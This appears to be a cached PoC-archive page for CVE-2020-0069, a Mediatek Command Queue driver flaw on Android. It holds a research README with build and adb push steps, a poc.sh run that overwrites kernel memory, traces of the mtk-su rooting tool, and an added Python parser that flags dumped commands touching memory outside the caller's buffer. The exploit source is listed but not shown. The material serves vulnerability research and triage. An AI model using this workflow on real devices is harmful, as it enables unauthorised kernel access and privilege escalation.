PoC details: 25b81145f28103ee880f6e218c17ee200db5040d

Source
Related vulnerability
Title: Google Android Mediatek Command Queue driver buffer error vulnerability (CVE-2020-0069)
Description: Android is a Linux-based open-source operating system developed by Google (US) and the Open Handset Alliance (OHA). The Mediatek Command Queue driver is one of its command queue drivers. The Mediatek Command Queue driver in Android has a buffer error vulnerability. An attacker can exploit this vulnerability to escalate privileges.
Introduction
# Description

This repository contains the materials we used to investigate CVE-2020-0069 on a Xiaomi Redmi 6a (with a Mediatek SoC MT6762M).

There are three programs:

 - `kernel_rw.c`: a C program that reads and writes kernel memory
 - `poc.sh`: a shell script
 - `syscall_hook.c`: a C library that can be preloaded to trace the program `mtk-su` (tested on version 19)

## Build

To build the binaries:

```bash
$ ndk-build
```

Then push them on the device:

```bash
$ adb push poc.sh /data/local/tmp
$ adb push libs/armeabi-v7a/kernel_rw /data/local/tmp
$ adb push libs/armeabi-v7a/libsyscall_hook.so /data/local/tmp
```

## Usage

### CVE-2020-0069 PoC

```bash
$ uname -a
Linux localhost 4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l
$ sh poc.sh
[+] Found Linux string at 0x4180bc00
[+] Found Linux string at 0x4180bea0
[+] Write the patched value
$ uname -a
minix  4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l
```

### To trace mtk-su

```bash
$ mkdir mtk-su
$ LD_PRELOAD=./syscall_hook.so ./mtk-su
alloc failed
alloc count=400 startPA=0x53df4000
uncatched ioctl 40e07803
exec command (num 0) ( blockSize=8040, readAddress.count=0 ) dumped into cmd-0
exec command (num 1) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-1
exec command (num 2) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-2
[...]
$ cat  mtksu/cmd-1
WFE to_wait=1, wait=1, to_update=1, update=0, event=1da
MOVE 40a68000 into reg 17
READ  address reg 17, data reg b
MOVE startPA+0 into reg 17
WRITE  address reg 17, data reg b
[...]
```
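The listing above is what `syscall_hook` dumps for each command buffer handed to the driver: `MOVE` loads a register with either an absolute physical address or an offset into the caller's own `startPA` allocation, and `READ`/`WRITE` then dereference an address register. For triage of such captures, the following parser is an added example (not part of the repository): it replays the listing, tracks what each register was last loaded with, and classifies every `READ`/`WRITE` by whether its target is an offset into the caller's buffer or an absolute address elsewhere. The line format is taken from the `cmd-1` excerpt; the sample input is constructed from those lines, and the assumption that every non-`startPA` target lies outside the caller's allocation is the example's own.

```python
import re
from dataclasses import dataclass

# Constructed sample input: a command listing in the format the syscall_hook
# tracer prints (see the cmd-1 excerpt above). Registers and addresses are hex.
SAMPLE_DUMP = """\
WFE to_wait=1, wait=1, to_update=1, update=0, event=1da
MOVE 40a68000 into reg 17
READ  address reg 17, data reg b
MOVE startPA+0 into reg 17
WRITE  address reg 17, data reg b
"""

# MOVE <hex addr | startPA+<hex off>> into reg <hex>
MOVE_RE = re.compile(
    r"^MOVE\s+(?:startPA\+(?P<off>[0-9a-fA-F]+)|(?P<abs>[0-9a-fA-F]+))"
    r"\s+into reg\s+(?P<reg>[0-9a-fA-F]+)$"
)
# READ|WRITE address reg <hex>, data reg <hex>
RW_RE = re.compile(
    r"^(?P<op>READ|WRITE)\s+address reg\s+(?P<areg>[0-9a-fA-F]+),"
    r"\s*data reg\s+(?P<dreg>[0-9a-fA-F]+)$"
)


@dataclass(frozen=True)
class Access:
    line_no: int
    op: str              # "READ" or "WRITE"
    target: str          # "startPA+<off>", "0x<abs>" or "reg <n> (unloaded)"
    in_allocation: bool  # True only for startPA-relative targets (assumption)


def analyze_dump(text):
    """Replay the listing, remembering what each register was last loaded with,
    and classify every READ/WRITE by where its address register points."""
    regs = {}      # reg number -> ("rel", offset) | ("abs", address)
    accesses = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = MOVE_RE.match(line)
        if m:
            reg = int(m.group("reg"), 16)
            if m.group("off") is not None:
                regs[reg] = ("rel", int(m.group("off"), 16))
            else:
                regs[reg] = ("abs", int(m.group("abs"), 16))
            continue
        m = RW_RE.match(line)
        if not m:
            continue   # WFE and any other opcode carry no memory address
        areg = int(m.group("areg"), 16)
        kind, val = regs.get(areg, ("none", None))
        if kind == "rel":
            accesses.append(Access(n, m.group("op"), f"startPA+{val:x}", True))
        elif kind == "abs":
            accesses.append(Access(n, m.group("op"), f"0x{val:08x}", False))
        else:
            # Address register never loaded in this listing: cannot be trusted
            accesses.append(Access(n, m.group("op"), f"reg {areg:x} (unloaded)", False))
    return accesses


def outside_allocation(accesses):
    """The accesses a reviewer looks at first: targets that are not offsets
    into the caller's own startPA buffer."""
    return [a for a in accesses if not a.in_allocation]


if __name__ == "__main__":
    found = analyze_dump(SAMPLE_DUMP)
    for a in found:
        flag = "" if a.in_allocation else "  <-- outside startPA allocation"
        print(f"line {a.line_no}: {a.op:5s} {a.target}{flag}")
```

Run over the sample, the script reports the `READ` on line 3 as targeting `0x40a68000` outside the caller's allocation and the `WRITE` on line 5 as landing at `startPA+0`; applied to the full set of `cmd-N` files, `outside_allocation()` gives a quick list of which dumped commands touch physical memory the submitting process did not allocate.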
File snapshot

```
[4.0K] /data/pocs/25b81145f28103ee880f6e218c17ee200db5040d
├── [4.0K] jni
│   ├── [ 333] Android.mk
│   ├── [ 102] Application.mk
│   ├── [ 12K] kernel_rw.c
│   ├── [4.0K] mtk
│   │   ├── [ 13K] cmdq_def.h
│   │   ├── [5.9K] cmdq_engine_common.h
│   │   ├── [ 19K] cmdq_event_common.h
│   │   ├── [1.7K] cmdq_subsys_common.h
│   │   ├── [3.4K] cmdq_v3_driver.h
│   │   └── [1.3K] mtk-cmdq.h
│   └── [8.1K] syscall_hook.c
├── [ 11K] LICENSE
├── [ 938] poc.sh
└── [1.5K] README.md

2 directories, 13 files
```

Cached for you by the Shenlong bot
Notes
    1. It is recommended to access the PoC through the source first.
    2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.